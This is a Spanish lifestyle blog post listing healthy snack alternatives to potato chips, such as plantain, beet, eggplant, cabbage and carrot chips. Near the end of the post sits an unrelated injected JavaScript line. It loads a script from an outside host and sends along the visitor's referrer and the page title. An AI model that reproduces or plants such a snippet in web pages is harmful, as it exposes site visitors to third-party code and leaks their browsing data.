Salud y belleza » Salud, alimentos, dieta saludable

Algunas alternativas saludables a las patatas fritas

Sin Comentarios

Las patatas fritas son un snack o un aperitivo muy apetecible pero no es recomendable excederse porque pueden resultar poco saludables. Por eso hoy queremos hablarte de una serie de alternativas saludables a las patatas fritas que puedes utilizar para sustituir este snack:

Plátano o banana: en Latinoamérica es habitual acompañar los platos con plátano frito, un alimento que es rico en fibra y potasio y que puede servir como una estupenda fuente de energía.

platano-frito

- Remolacha: es una delicia crujiente que puedes comer como chips y que además es rica en antioxidantes, disminuye la presión arterial y reduce los riesgos de padecer ataques al corazón.

Berenjenas: cortadas a la juliana, con harina y fritas son un snack muy parecido a las patatas. Además, puedes hacerlas saladas con sal y pimienta o dulces con miel. Son ricas en vitaminas, minerales y fibra.

berenjenas-con-miel

- Col: si cortas la col en finas hojas, la rocías con aceite de oliva y las metes en el horno tendrás un snack crujiente rico en magnesio, calcio, vitamina A, C y K.

- Zanahorias: corta las zanahorias en círculos, échales canela y cocínalas en el horno. El aperitivo saludable con vitamina A que ayuda a prevenir el cáncer y a mantener la piel joven y suave.

zanahoria-frita

¿Cuál de estas alternativas de las patatas fritas te gusta más?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.